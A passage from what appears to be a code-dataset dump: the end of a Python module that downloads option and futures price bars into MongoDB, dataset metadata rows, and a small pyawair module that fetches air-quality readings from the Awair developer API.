strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
pass
def QA_SU_save_option_commodity_min(
client=DATABASE,
ui_log=None,
ui_progress=None
):
'''
:param client:
:return:
'''
# 测试中发现, 一起回去,容易出现错误,每次获取一个品种后 ,更换服务ip继续获取 ?
_save_option_commodity_cu_min(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_sr_min(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_m_min(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_ru_min(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_cf_min(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
_save_option_commodity_c_min(
client=client,
ui_log=ui_log,
ui_progress=ui_progress
)
def QA_SU_save_option_50etf_min(client=DATABASE, ui_log=None, ui_progress=None):
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_option_50etf_contract_time_to_market()
coll_option_min = client.option_day_min
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Option 50ETF MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Option 50ETF {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Option 50ETF {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_50etf_day(client=DATABASE, ui_log=None, ui_progress=None):
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_option_50etf_contract_time_to_market()
coll_option_day = client.option_day
coll_option_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
def __saving_work(code, coll_option_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY==== {}'.format(str(code)),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
# 期权代码 从 10000001 开始编码 10001228
ref = coll_option_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取期权日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(item / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(option_contract_list[item].code, coll_option_day)
if len(err) < 1:
QA_util_log_info('SUCCESS save option day ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_contract_list(
client=DATABASE,
ui_log=None,
ui_progress=None):
rows_of_option = QA_fetch_get_option_all_contract_time_to_market()
# rows_cu = QA_fetch_get_commodity_option_CU_contract_time_to_market()
# rows_m = QA_fetch_get_commodity_option_M_contract_time_to_market()
# rows_sr = QA_fetch_get_commodity_option_SR_contract_time_to_market()
# rows_cf = QA_fetch_get_commodity_option_CF_contract_time_to_market()
# rows_ru = QA_fetch_get_commodity_option_RU_contract_time_to_market()
# rows_c = QA_fetch_get_commodity_option_C_contract_time_to_market()
try:
# 🛠todo 这个应该是第一个任务 JOB01, 先更新股票列表!!
QA_util_log_info(
'##JOB15 Now Saving OPTION_CONTRACT_LIST ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=5000
)
coll = client.option_contract_list
coll.create_index([('desc', pymongo.ASCENDING)], unique=True)
# todo fixhere
# from_items is deprecated. Please use DataFrame.from_dict(dict(items), ...) instead. DataFrame.from_dict
try:
df = pd.DataFrame.from_items([(s.desc, s) for s in rows_of_option])
df = (df.T)
js = QA_util_to_json_from_pandas(df)
# result0 = coll.insert_many(js)
for a_js_row in js:
# print(a_js_row)
akey = a_js_row['desc']
id0 = coll.find_one({'desc': akey})
if id0 is None:
coll.insert(a_js_row)
# print(result0)
except pymongo.errors.BulkWriteError as e:
# https://ask.helplib.com/python/post_12740530
panic = filter(
lambda x: x['code'] != 11000,
e.details['writeErrors']
)
# if len(panic) > 0:
# print
# "really panic"
QA_util_log_info(
"完成合约列表更新",
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=10000
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
print(" Error save_tdx.QA_SU_save_option_contract_list exception!")
def QA_SU_save_option_day_all(client=DATABASE,ui_log=None,ui_progress=None):
option_contract_list = QA_fetch_get_option_all_contract_time_to_market()
coll_option_day = client.option_day_all
coll_option_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
def __saving_work(code, coll_option_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY ALL ==== {}'.format(str(code)),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
# 期权代码 从 10000001 开始编码 10001228
ref = coll_option_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取期权日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(item / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(option_contract_list[item].code, coll_option_day)
if len(err) < 1:
QA_util_log_info('SUCCESS save option day all contract ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_option_min_all(client=DATABASE, ui_log=None, ui_progress=None):
'''
:param client:
:return:
'''
option_contract_list = QA_fetch_get_option_all_contract_time_to_market()
coll_option_min = client.option_min_all
coll_option_min.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
# 索引 code
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB15 Now Saving Option ALL MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:8], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB99.{} Now Saving Option ALL MIN {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增历史合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB15.{} Now Option ALL MIN {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
QA_util_log_info(
" 写入 新增合约记录数 {} ".format(len(__data))
)
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(
__saving_work,
option_contract_list[i_]["code"],
coll_option_min
)
for i_ in range(len(option_contract_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(option_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(option_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(option_contract_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
#######################################################################################
def QA_SU_save_future_list(client=DATABASE, ui_log=None, ui_progress=None):
future_list = QA_fetch_get_future_list()
coll_future_list = client.future_list
coll_future_list.create_index("code", unique=True)
try:
coll_future_list.insert_many(
QA_util_to_json_from_pandas(future_list),
ordered=False
)
except:
pass
def QA_SU_save_index_list(client=DATABASE, ui_log=None, ui_progress=None):
index_list = QA_fetch_get_index_list()
coll_index_list = client.index_list
coll_index_list.create_index("code", unique=True)
try:
coll_index_list.insert_many(
QA_util_to_json_from_pandas(index_list),
ordered=False
)
except:
pass
def QA_SU_save_future_day(client=DATABASE, ui_log=None, ui_progress=None):
'''
save future_day
保存日线数据
:param client:
:param ui_log: 给GUI qt 界面使用
:param ui_progress: 给GUI qt 界面使用
:param ui_progress_int_value: 给GUI qt 界面使用
:return:
'''
future_list = [
item for item in QA_fetch_get_future_list().code.unique().tolist()
if str(item)[-2:] in ['L8',
'L9']
]
coll_future_day = client.future_day
coll_future_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_future_day):
try:
QA_util_log_info(
'##JOB12 Now Saving Future_DAY==== {}'.format(str(code)),
ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_future_day.find({'code': str(code)[0:4]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_future_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_future_day(
str(code),
QA_util_get_next_day(start_date),
end_date
)
)
)
# 当前数据库中没有这个代码的股票数据, 从1990-01-01 开始下载所有的数据
else:
start_date = '2001-01-01'
QA_util_log_info(
'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_future_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_future_day(
str(code),
start_date,
end_date
)
)
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(future_list)):
QA_util_log_info('The {} of Total {}'.format(item, len(future_list)))
strProgressToLog = 'DOWNLOAD PROGRESS {} {}'.format(
str(float(item / len(future_list) * 100))[0:4] + '%',
ui_log
)
intProgressToLog = int(float(item / len(future_list) * 100))
QA_util_log_info(
strProgressToLog,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgressToLog
)
__saving_work(future_list[item], coll_future_day)
if len(err) < 1:
QA_util_log_info('SUCCESS save future day ^_^', ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log)
QA_util_log_info(err, ui_log)
def QA_SU_save_future_day_all(client=DATABASE, ui_log=None, ui_progress=None):
'''
save future_day_all
保存日线数据(全部, 包含单月合约)
:param client:
:param ui_log: 给GUI qt 界面使用
:param ui_progress: 给GUI qt 界面使用
:param ui_progress_int_value: 给GUI qt 界面使用
:return:
'''
future_list = QA_fetch_get_future_list().code.unique().tolist()
coll_future_day = client.future_day
coll_future_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_future_day):
try:
QA_util_log_info(
'##JOB12 Now Saving Future_DAY==== {}'.format(str(code)),
ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_future_day.find({'code': str(code)[0:6]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_future_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_future_day(
str(code),
QA_util_get_next_day(start_date),
end_date
)
)
)
# 当前数据库中没有这个代码的股票数据, 从1990-01-01 开始下载所有的数据
else:
start_date = '2001-01-01'
QA_util_log_info(
'UPDATE_Future_DAY \n Trying updating {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log
)
if start_date != end_date:
coll_future_day.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_future_day(
str(code),
start_date,
end_date
)
)
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(future_list)):
QA_util_log_info('The {} of Total {}'.format(item, len(future_list)))
strProgressToLog = 'DOWNLOAD PROGRESS {} {}'.format(
str(float(item / len(future_list) * 100))[0:4] + '%',
ui_log
)
intProgressToLog = int(float(item / len(future_list) * 100))
QA_util_log_info(
strProgressToLog,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intProgressToLog
)
__saving_work(future_list[item], coll_future_day)
if len(err) < 1:
QA_util_log_info('SUCCESS save future day ^_^', ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log)
QA_util_log_info(err, ui_log)
def QA_SU_save_future_min(client=DATABASE, ui_log=None, ui_progress=None):
"""save future_min
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
future_list = [
item for item in QA_fetch_get_future_list().code.unique().tolist()
if str(item)[-2:] in ['L8',
'L9']
]
coll = client.future_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Future_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Future {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Saving Future {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(__saving_work,
future_list[i_],
coll)
for i_ in range(len(future_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(future_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(future_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(future_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_future_min_all(client=DATABASE, ui_log=None, ui_progress=None):
"""save future_min_all (全部, 包含单月合约)
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
future_list = QA_fetch_get_future_list().code.unique().tolist()
coll = client.future_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB13 Now Saving Future_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB13.{} Now Saving Future {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB13.{} Now Saving Future {} from {} to {} =={} '
.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_future_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(__saving_work,
future_list[i_],
coll)
for i_ in range(len(future_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(future_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(future_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(future_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
if __name__ == '__main__':
# QA_SU_save_stock_day()
# QA_SU_save_stock_xdxr()
# QA_SU_save_stock_min()
# QA_SU_save_stock_transaction()
# QA_SU_save_index_day()
# QA_SU_save_stock_list()
# QA_SU_save_index_min()
# QA_SU_save_index_list()
# QA_SU_save_future_list()
QA_SU_save_future_day()
QA_SU_save_future_min()
| 33.195677
| 118
| 0.430149
| 16,478
| 173,547
| 4.132419
| 0.025671
| 0.056466
| 0.041222
| 0.072165
| 0.950363
| 0.932285
| 0.926748
| 0.919699
| 0.913311
| 0.896569
| 0
| 0.022395
| 0.478211
| 173,547
| 5,227
| 119
| 33.202028
| 0.729523
| 0.046374
| 0
| 0.786197
| 0
| 0
| 0.07888
| 0.001622
| 0
| 0
| 0
| 0.000957
| 0
| 1
| 0.020518
| false
| 0.002798
| 0.003031
| 0.000233
| 0.024015
| 0.00373
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2947ece7313e9afff8decbf03c8a3ad7d8c40923
| 4,970
|
py
|
Python
|
pyawair/data.py
|
andriykorchak/pyawair
|
5f0bbcfe79712fca467b116ef1dce77317a692b9
|
[
"Apache-2.0"
] | 16
|
2018-07-16T00:15:59.000Z
|
2020-09-06T02:24:40.000Z
|
pyawair/data.py
|
andriykorchak/pyawair
|
5f0bbcfe79712fca467b116ef1dce77317a692b9
|
[
"Apache-2.0"
] | 32
|
2018-07-28T17:07:56.000Z
|
2021-03-22T16:38:02.000Z
|
pyawair/data.py
|
andriykorchak/pyawair
|
5f0bbcfe79712fca467b116ef1dce77317a692b9
|
[
"Apache-2.0"
] | 3
|
2018-07-29T15:58:05.000Z
|
2021-03-18T19:07:54.000Z
|
from pyawair.devices import *
import pyawair.conn
import pyawair.objects
def get_current_air_data(auth, device_name=None, device_type=None, device_id=None):
"""
Function to get the current air data from a single specific Awair Device linked
to your account
:param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
:param device_type: str which matches the awair device type
:param device_name: str which matches exactly to the name of a specific device
:param device_id: str or int which matches the specific awair device internal id number
:return: Object of Dict type which contains current air data
"""
if device_type is None or device_id is None:
awair_device = pyawair.objects.AwairDev(device_name, auth)
device_type = awair_device.type()
device_id = awair_device.id()
base_url = "https://developer-apis.awair.is/v1/users/self/devices/"
data_url = "/air-data/latest"
data = pyawair.conn.get_data(auth, device_id, device_type, base_url, data_url)
return data
def get_5_min_average(auth, device_name=None, device_type=None, device_id=None, limit=1000,
desc=True):
"""
Function to get air data that is averaged over each 5 minutes from a single specific Awair
Device linked
to your account
:param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
:param device_type: str which matches the awair device type
:param device_name: str which matches exactly to the name of a specific device
:param device_id: str or int which matches the specific awair device internal id number
:param limit: int that specifies the number of 5-minute periods to query
:param desc: bool where True specifies descending (newest first) and False specifies
ascending (oldest first)
:return: Object of Dict type which contains current air data
"""
if device_type is None or device_id is None:
awair_device = pyawair.objects.AwairDev(device_name, auth)
device_type = awair_device.type()
device_id = awair_device.id()
base_url = "https://developer-apis.awair.is/v1/users/self/devices/"
data_url = "/air-data/5-min-avg"
if desc:
desc_param = "true"
else:
desc_param = "false"
args = "?limit={}&desc={}".format(limit, desc_param)
data = pyawair.conn.get_data(auth, device_id, device_type, base_url, data_url, args)
return data
def get_15_min_average(auth, device_name=None, device_type=None, device_id=None, limit=1000,
desc=True):
"""
Function to get air data that is averaged over each 5 minutes from a single specific Awair
Device linked
to your account
:param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
:param device_type: str which matches the awair device type
:param device_name: str which matches exactly to the name of a specific device
:param device_id: str or int which matches the specific awair device internal id number
:param limit: int that specifies the number of 15-minute periods to query
:param desc: bool where True specifies descending (newest first) and False specifies
ascending (oldest first)
:return: Object of Dict type which contains current air data
"""
if device_type is None or device_id is None:
awair_device = pyawair.objects.AwairDev(device_name, auth)
device_type = awair_device.type()
device_id = awair_device.id()
base_url = "https://developer-apis.awair.is/v1/users/self/devices/"
data_url = "/air-data/15-min-avg"
if desc:
desc_param = "true"
else:
desc_param = "false"
args = "?limit={}&desc={}".format(limit, desc_param)
data = pyawair.conn.get_data(auth, device_id, device_type, base_url, data_url, args)
return data
def get_raw_data(auth, device_name=None, device_type=None, device_id=None):
"""
Function to get air data that is averaged over each 5 minutes from a single specific
Awair Device linked
to your account
:param auth: pyawair.auth.AwairAuth object which contains a valid authentication token
:param device_type: str which matches the awair device type
:param device_name: str which matches exactly to the name of a specific device
:param device_id: str or int which matches the specific awair device internal id number
:return: Object of Dict type which contains current air data
"""
if device_type is None or device_id is None:
awair_device = pyawair.objects.AwairDev(device_name, auth)
device_type = awair_device.type()
device_id = awair_device.id()
base_url = "https://developer-apis.awair.is/v1/users/self/devices/"
data_url = "/air-data/raw"
data = pyawair.conn.get_data(auth, device_id, device_type, base_url, data_url)
return data
| 44.375
| 95
| 0.711268
| 738
| 4,970
| 4.653117
| 0.119241
| 0.081538
| 0.044263
| 0.020967
| 0.964764
| 0.964764
| 0.964764
| 0.964764
| 0.964764
| 0.964764
| 0
| 0.006152
| 0.215091
| 4,970
| 111
| 96
| 44.774775
| 0.874135
| 0.467807
| 0
| 0.784314
| 0
| 0
| 0.139073
| 0
| 0
| 0
